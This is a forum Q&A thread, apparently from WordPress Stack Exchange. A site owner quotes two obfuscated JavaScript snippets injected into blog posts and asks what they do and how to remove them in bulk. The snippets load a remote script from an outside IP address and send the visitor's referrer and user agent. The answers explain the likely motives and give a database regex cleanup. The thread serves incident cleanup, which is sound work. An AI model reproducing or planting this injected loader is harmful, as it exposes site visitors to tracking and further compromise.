# Why would a hacker add this code to each post, and how to do mass cleanup?

Tags: hacked

Here is example of code I have seen inserted in two different posts:

```
<noindex><script id="wpinfo-pst1" type="text/javascript" rel="nofollow">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\\o="+3(j.i)+"\'><\\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hkfkr|var|u0026u|referrer|fdrht||js|php'.split('|'),0,{}))
</script></noindex>
```

Second Example:

```
<noindex><script id="wpinfo-pst1" type="text/javascript" rel="nofollow">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\o="+3(j.i)+"\'><\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kzfke|var|u0026u|referrer|dabzy||js|php'.split('|'),0,{}))
</script></noindex>
```

Why would hacker get out of this?

How can I do a mass-replace.  Can I do a regex in MYSQL and update the WP-Posts directly? Seems like just a few letters are different on each one.

Comment: Are you investigating this just for learning purposes? Or do you need help cleaning up an infected site? It's two questions in one thread.

Answer (score 1, accepted):

As I was using MariaDB, the following update did the fix:

```
update wp_posts set post_content = REGEXP_REPLACE(post_content,'(*CRLF)<noindex>.*</noindex> ','')
```

See https://dba.stackexchange.com/questions/234774/mariadb-multiline-regex/234778#234778

Answer (score 0):

I'm sorry to see your site has malicious code in it. Unfortunately, [helping to fix compromised sites is outside the scope of this community](https://wordpress.stackexchange.com/help/on-topic).

I can answer your first question, though. This code appears to be garbled, but it is redirecting traffic from your site to some IP address with a path. I can't say exactly why, but this is usually to generate referral traffic, generate cryptocurrency, or compromise browsers in an effort to glean valuable personal information.

It's dangerous to your visitors to leave this code on your site.

Answer (score 0):

There is lots of info on the googles (or bings, or ducks) about how to clean up a site. And it is true that your question is out of scope for this place.

But, it is something that is asked often. Code that you don't recognize is probably dangerous to your site and your visitors. (Like the code that was inside the "Yellow Pencil" theme, and other themes/plugins that have been compromised.)

So, cleaning is important. And it can be done, although it is a bit of work (I've done it for clients).

See my (accepted) answer here on my recommendations: [Is this a hacking script in function.php?](https://wordpress.stackexchange.com/questions/333380/is-this-a-hacking-script-in-function-php/333383#333383) .  If it was my site (or one that I manage), that's the procedure I would use to clean up a site.

Comment: Thanks, I already did those steps; but you don't mention cleaning up garbage injected into wp_posts.

Comment: In the sites that I have had to clean, there was no injection into the actual post. That would be a bit harder to remove; you could use a Search/Replace plugin, but you'd need to find an exact string to match. You'd need to see if the same exact string was in all posts (looking at the text view). It's more likely an injection into the generated page, not an injection in the posts database, IMHO. If you have done my/similar cleanup, then looking at the generated page source code would inform you if the infection is still there.

Comment: I already fixed and posted my answer.